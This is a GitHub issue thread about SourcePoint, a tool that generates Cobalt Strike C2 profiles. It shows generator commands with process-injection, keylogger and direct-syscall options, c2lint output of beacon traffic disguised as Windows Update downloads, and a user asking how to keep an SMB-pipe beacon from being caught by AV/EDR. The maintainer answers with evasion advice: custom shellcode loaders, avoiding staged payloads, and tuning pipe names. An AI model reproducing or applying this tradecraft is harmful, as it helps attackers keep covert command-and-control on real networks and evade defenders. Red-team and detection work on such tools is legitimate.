Closed sec13b closed 7 months ago
include all defaults ?
./SourcePoint -Injector NtMapViewOfSection -Jitter 20 -Keylogger SetWindowsHookEx -PE_Clone 24 -PostEX_Name 13 -Profile 1 -Stage True -Sleep 0 -Syscall Direct -Useragent Win10Chrome -Outfile myprofile.profile -Host {SECRET.IP}
` [*] Starting c2lint
GET /c/msdownload/update/others/2021/10/P9WLwVNmTXfe7sI7N2bX4Zu6QJAzrQTvPKb39JFx0_Q.cab HTTP/1.1 Accept: / Host: 168.235.72.134 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4562.0 Safari/537.36
HTTP/1.1 200 OK Content-Type: application/vnd.ms-cab-compressed Server: Microsoft-IIS/8.5 MSRegion: N. America Connection: keep-alive X-Powered-By: ASP.NET Content-Length: 131
uv....C...G..2..z$......q.....,..*....dV../.ku..Q-...>....L....J(.data_jitter:up.to.50.bytes.of.random.data...)
GET /c/msdownload/update/others/2021/10/xynGXwrm5ysSl7aIffi3CfJtEdf_WyhvDGWzOs5Q.cab HTTP/1.1 Accept: / Host: download.windowsupdate.com/c/42905 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4562.0 Safari/537.36
HTTP/1.1 200 OK Content-Type: application/vnd.ms-cab-compressed Server: Microsoft-IIS/8.5 MSRegion: N. America Connection: keep-alive X-Powered-By: ASP.NET Content-Length: 67
(.data_jitter:up.to.50.bytes.of.random.data...)
GET /WT9x HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4562.0 Safari/537.36
HTTP/1.1 200 OK Content-Type: application/vnd.ms-cab-compressed
[+] POST 3x check passed [+] .http-get.server.output size is good [+] .http-get.client size is good [+] .http-post.client size is good [+] .http-get.client.metadata transform+mangle+recover passed (1 byte[s]) [+] .http-get.client.metadata transform+mangle+recover passed (100 byte[s]) [+] .http-get.client.metadata transform+mangle+recover passed (128 byte[s]) [+] .http-get.client.metadata transform+mangle+recover passed (256 byte[s]) [+] .http-get.server.output transform+mangle+recover passed (0 byte[s]) [+] .http-get.server.output transform+mangle+recover passed (1 byte[s]) [+] .http-get.server.output transform+mangle+recover passed (48248 byte[s]) [+] .http-get.server.output transform+mangle+recover passed (1048576 byte[s]) [+] .http-post.client.id transform+mangle+recover passed (4 byte[s]) [+] .http-post.client.output transform+mangle+recover passed (0 byte[s]) [+] .http-post.client.output transform+mangle+recover passed (1 byte[s]) [+] .http-post.client.output chunks results [+] .http-post.client.output transform+mangle+recover passed (33 byte[s]) [+] .http-post.client.output transform+mangle+recover passed (128 byte[s]) [!] Profile uses HTTP Host header for C&C. Will ignore Host header specified in payload config. [%] [OPSEC] .host_stage is true. Your Beacon payload is available to anyone that connects to your server to request it. Are you OK with this? [!] .code-signer.keystore is missing. Will not sign executables and DLLs [+] SSL certificate generation OK [] Checking beacon WININET dlls... [] Checking beacon WINHTTP dlls... [!] Detected 2 warnings. root@host5:/opt# `
So I'll try to answer your questions to the best of my ability. First, I would never use the standard .exe or .dll. Cobalt strike is a widely C2 framework as such samples of those files have been uploaded to every AV/EDR company. It's recommend to always use the raw shellcode option with a custom loader. Custom loaders have a higher success of then launching the shellcode.
Second,to your comment about staged shellcode, I typically don't run with that option because staged shellcode is a huge IOC (because you can't customize the method of communication for the second stage, so everyone who runs staged is doing the same thing).
I understand perfectly.I just want to learn more
but example : Its any option to (\192.168.1.114\ADMIN$\74c35f5.exe) crypted , to bypass av/erd in pentest : Tasked beacon to run windows/beacon_bind_pipe (\.\pipe\msagent_e1) on 192.168.1.114 via Service Control Manager (\192.168.1.114\ADMIN$\74c35f5.exe) is killed instant
So that sounds like an issue with how Cobalt Strike is doing post-ex actions related to setting up a pipe (in the example above). This doesn't have much to do with SourcePoint rather it could be limitations/IOCs for how Cobalt Strike does certain actions (for example setting up pipes). SourcePoint has three options for SMB they are: SMB Frame Header - Adds a header value to the SMB beacon messages Pipename - Sets the name of the SMB pipe the beacons is going to use for communication Pipename Stager - Sets the name of the SMB stager for the beacons
If you want to learn more Id suggest playing around with these options and see if your results vary.
Thank you a lot. I will test.
i use this 2 command :
./SourcePoint -Injector NtMapViewOfSection -Host {SECRET.IP} -Jitter 20 -Outfile teststage2.profile -Stage True -PE_Clone 12 -PostEX_Name 11 -Profile 1 -Useragent Win10Chrome
[] Preparing Varibles... [!] Self Signed SSL Cerificate Used [] Building Profile... [!] Host Staging Is Enabled - Staged Payloads Are Available But Your Beacon Payload Is Available To Anyone That Connects To Your Server To Request It [] Beacon DLL Spoofed To: srvcli.dll [] Post-Ex Process Name: mcbuilder.exe [!] Beacon Shellcode Will Obfuscate Beacon in Memory Prior to Sleeping [!] ThreadSpooffing in enabled [!] No Syscall method selected [*] Seleted Profile: WindowsUpdate [+] Profile Generated: teststage2.profile [+] Happy Hacking
./SourcePoint -Outfile out.profile -Host {SECRET.IP} -Injector NtMapViewOfSection [] Preparing Varibles... [] Building Profile... [!] Host Staging Is Disabled - Staged Payloads Are Not Available But Your Beacon Payload Is Not Available To Anyone That Connects [] Beacon DLL Spoofed To: GPSVC.dll [] Post-Ex Process Name: pcaui.exe [!] Beacon Shellcode Will Obfuscate Beacon in Memory Prior to Sleeping [!] ThreadSpooffing in enabled [!] No Syscall method selected [*] Seleted Profile: [+] Profile Generated: strannik2.profile [+] Happy Hacking
Is normal?
and the exe is detected